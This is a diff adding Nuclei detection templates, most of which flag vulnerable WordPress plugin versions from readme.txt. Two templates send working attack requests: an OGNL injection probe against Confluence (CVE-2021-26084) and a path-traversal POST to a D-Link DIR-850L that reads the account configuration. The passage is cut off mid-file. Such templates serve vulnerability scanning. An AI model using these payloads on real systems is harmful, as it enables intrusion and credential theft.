CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d + +info: + name: > + Clients <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Clients plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49589caf-232b-4067-a607-2902e932553e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54245 + metadata: + fofa-query: "wp-content/plugins/clients/" + google-query: inurl:"/wp-content/plugins/clients/" + shodan-query: 'vuln:CVE-2024-54245' + tags: cve,wordpress,wp-plugin,clients,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clients/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clients" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml b/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml new file mode 100644 index 0000000000..e864a4af39 --- /dev/null +++ b/poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e + +info: + name: > + TAX SERVICE Electronic HDM <= 1.1.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The TAX SERVICE Electronic HDM plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/970c7495-e43c-4606-8154-e2ac7d1c4816?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-54261 + metadata: + fofa-query: "wp-content/plugins/virtual-hdm-for-taxservice-am/" + google-query: inurl:"/wp-content/plugins/virtual-hdm-for-taxservice-am/" + shodan-query: 'vuln:CVE-2024-54261' + tags: cve,wordpress,wp-plugin,virtual-hdm-for-taxservice-am,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/virtual-hdm-for-taxservice-am/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "virtual-hdm-for-taxservice-am" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml b/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml new file mode 100644 index 0000000000..ea05746fcc --- /dev/null +++ b/poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9 + +info: + name: > + Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Import Export For WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-54262 + metadata: + fofa-query: "wp-content/plugins/import-export-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54262' + tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-export-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml b/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml new file mode 100644 index 0000000000..c2c020947c --- /dev/null +++ b/poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad + +info: + name: > + CM Answers <= 3.2.6 - Missing Authorization + author: topscoder + severity: low + description: > + The CM Answers – Powerful WordPress Forum Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54267 + metadata: + fofa-query: "wp-content/plugins/cm-answers/" + google-query: inurl:"/wp-content/plugins/cm-answers/" + shodan-query: 'vuln:CVE-2024-54267' + tags: cve,wordpress,wp-plugin,cm-answers,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-answers/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-answers" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml b/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml new file mode 100644 index 0000000000..01f97aa5e0 --- /dev/null +++ b/poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d + +info: + name: > + SiteOrigin Widgets Bundle <= 1.64.0 - Missing Authorization + author: topscoder + severity: low + description: > + The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.64.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54268 + metadata: + fofa-query: "wp-content/plugins/so-widgets-bundle/" + google-query: inurl:"/wp-content/plugins/so-widgets-bundle/" + shodan-query: 'vuln:CVE-2024-54268' + tags: cve,wordpress,wp-plugin,so-widgets-bundle,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "so-widgets-bundle" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.64.0') \ No newline at end of file diff --git a/poc/cve/cve-2021-26084.yaml b/poc/cve/cve-2021-26084.yaml new file mode 100644 index 0000000000..223055583e --- /dev/null +++ b/poc/cve/cve-2021-26084.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-26084 + +info: + author: dhiyaneshDk,philippedelteil + severity: critical + name: Confluence Server OGNL injection - RCE + description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. + tags: cve,cve2021,rce,confluence + reference: + - https://jira.atlassian.com/browse/CONFSERVER-67940 + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 + +requests: + - raw: + - | + POST /{{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - pages/createpage-entervariables.action + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'value="aaaa{140592=null}' diff --git a/poc/docker/amazon-docker-config-exposure.yaml b/poc/docker/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/docker/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/exposed/amazon-docker-config-exposure.yaml b/poc/exposed/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/exposed/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/other/agency-toolkit.yaml b/poc/other/agency-toolkit.yaml new file mode 100644 index 0000000000..61562b6e3d --- /dev/null +++ b/poc/other/agency-toolkit.yaml @@ -0,0 +1,59 @@ +id: agency-toolkit-c4d0da08ce2ccde8e115ab3f856365e3 + +info: + name: > + Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update + author: topscoder + severity: high + description: > + The Agency Toolkit plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'agency_toolkit_import' action in all versions up to, and including, 1.0.23. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f5cdb47-205a-4c03-a8a9-f39d1b4fc769?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: + metadata: + fofa-query: "wp-content/plugins/agency-toolkit/" + google-query: inurl:"/wp-content/plugins/agency-toolkit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,agency-toolkit,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/agency-toolkit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "agency-toolkit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.23') \ No newline at end of file diff --git a/poc/other/animation-addons-for-elementor.yaml b/poc/other/animation-addons-for-elementor.yaml new file mode 100644 index 0000000000..3a7ecf8834 --- /dev/null +++ b/poc/other/animation-addons-for-elementor.yaml @@ -0,0 +1,59 @@ +id: animation-addons-for-elementor-8cb2b19594b70ed1d20a65da8b6d2986 + +info: + name: > + Animation Addons for Elementor <= 1.1.6 - Authenticated (Contributor+) Sensitive Information Exposure via Content Slider and Tabs Widget Elementor Template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/animation-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/animation-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,animation-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/animation-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "animation-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.6') \ No newline at end of file diff --git a/poc/other/biagiotti-membership.yaml b/poc/other/biagiotti-membership.yaml new file mode 100644 index 0000000000..81a29180ee --- /dev/null +++ b/poc/other/biagiotti-membership.yaml @@ -0,0 +1,59 @@ +id: biagiotti-membership-890b34de1d7826afddfee44c27d08a72 + +info: + name: > + Biagiotti Membership <= 1.0.2 - Authentication Bypass via biagiotti_membership_check_facebook_user + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f319df-41eb-484a-8fca-af6ae76f4179?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/biagiotti-membership/" + google-query: inurl:"/wp-content/plugins/biagiotti-membership/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,biagiotti-membership,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/biagiotti-membership/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "biagiotti-membership" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml b/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml new file mode 100644 index 0000000000..743adaa9ed --- /dev/null +++ b/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml @@ -0,0 +1,59 @@ +id: broken-link-finder-4ff2e9009576af041b5a7e782318ee33 + +info: + name: > + Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/broken-link-finder/" + google-query: inurl:"/wp-content/plugins/broken-link-finder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,broken-link-finder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "broken-link-finder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml b/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml new file mode 100644 index 0000000000..e3624d70fd --- /dev/null +++ b/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml @@ -0,0 +1,59 @@ +id: button-block-ebc0f1c83e52f295da4b8e511e072df7 + +info: + name: > + Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/button-block/" + google-query: inurl:"/wp-content/plugins/button-block/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,button-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "button-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.5') \ No newline at end of file diff --git a/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml b/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml new file mode 100644 index 0000000000..12d403f6fb --- /dev/null +++ b/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml @@ -0,0 +1,59 @@ +id: clients-41225319ecc15ac24c062330ae8b961c + +info: + name: > + Clients <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49589caf-232b-4067-a607-2902e932553e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/clients/" + google-query: inurl:"/wp-content/plugins/clients/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,clients,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clients/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clients" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml b/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml new file mode 100644 index 0000000000..68c080e813 --- /dev/null +++ b/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml @@ -0,0 +1,59 @@ +id: cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce + +info: + name: > + CM Answers <= 3.2.6 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-answers/" + google-query: inurl:"/wp-content/plugins/cm-answers/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-answers,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-answers/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-answers" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.6') \ No newline at end of file diff --git a/poc/other/collapsing-categories.yaml b/poc/other/collapsing-categories.yaml new file mode 100644 index 0000000000..d02b12e207 --- /dev/null +++ b/poc/other/collapsing-categories.yaml @@ -0,0 +1,59 @@ +id: collapsing-categories-b92da15653f7212a9df1f5d57bdcbceb + +info: + name: > + Collapsing Categories <= 3.0.8 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05153b11-2f26-425e-99ab-93216861802b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/collapsing-categories/" + google-query: inurl:"/wp-content/plugins/collapsing-categories/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,collapsing-categories,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/collapsing-categories/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "collapsing-categories" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/poc/other/dlink-850l-info-leak.yaml b/poc/other/dlink-850l-info-leak.yaml new file mode 100644 index 0000000000..254efe51b6 --- /dev/null +++ b/poc/other/dlink-850l-info-leak.yaml @@ -0,0 +1,29 @@ +id: dlink-850L-info-leak + +info: + name: Dlink Dir-850L Info Leak + author: pikpikcu + severity: info + reference: https://xz.aliyun.com/t/2941 + tags: dlink + +requests: + - method: POST + path: + - "{{BaseURL}}/hedwig.cgi" + body: | + ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml + headers: + Cookie: uid=R8tBjwtFc8 + Content-Type: text/xml + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + - "" + part: body diff --git a/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml b/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml new file mode 100644 index 0000000000..46f417a9e6 --- /dev/null +++ b/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml @@ -0,0 +1,59 @@ +id: download-manager-0b3c1d139da969d81ea373f38d201244 + +info: + name: > + Download Manager <= 3.3.03 - Unauthenticated Arbitrary Shortcode Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7be578-5883-4cd3-963d-bf81c3af2003?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,download-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.03') \ No newline at end of file diff --git a/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml b/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml new file mode 100644 index 0000000000..30e9c2a61f --- /dev/null +++ b/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml @@ -0,0 +1,59 @@ +id: download-manager-81cd1d79de28b7aae9b449e5f006a9f6 + +info: + name: > + Download manager <= 3.3.03 - Improper Authorization to Unauthenticated Download of Password-Protected Files + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb915f4-66d6-4f46-949c-5354e414319b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,download-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.03') \ No newline at end of file diff --git a/poc/other/easy-waveform-player.yaml b/poc/other/easy-waveform-player.yaml new file mode 100644 index 0000000000..19ccc98abf --- /dev/null +++ b/poc/other/easy-waveform-player.yaml @@ -0,0 +1,59 @@ +id: easy-waveform-player-d8187a1daf11c2f64ad81046a48d9c78 + +info: + name: > + Easy Waveform Player <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-waveform-player/" + google-query: inurl:"/wp-content/plugins/easy-waveform-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-waveform-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-waveform-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-waveform-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml b/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml new file mode 100644 index 0000000000..7aafcbf145 --- /dev/null +++ b/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml @@ -0,0 +1,59 @@ +id: echoza-e1decf47b202b8b552a71edd87b20231 + +info: + name: > + Echoza <= 0.1.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 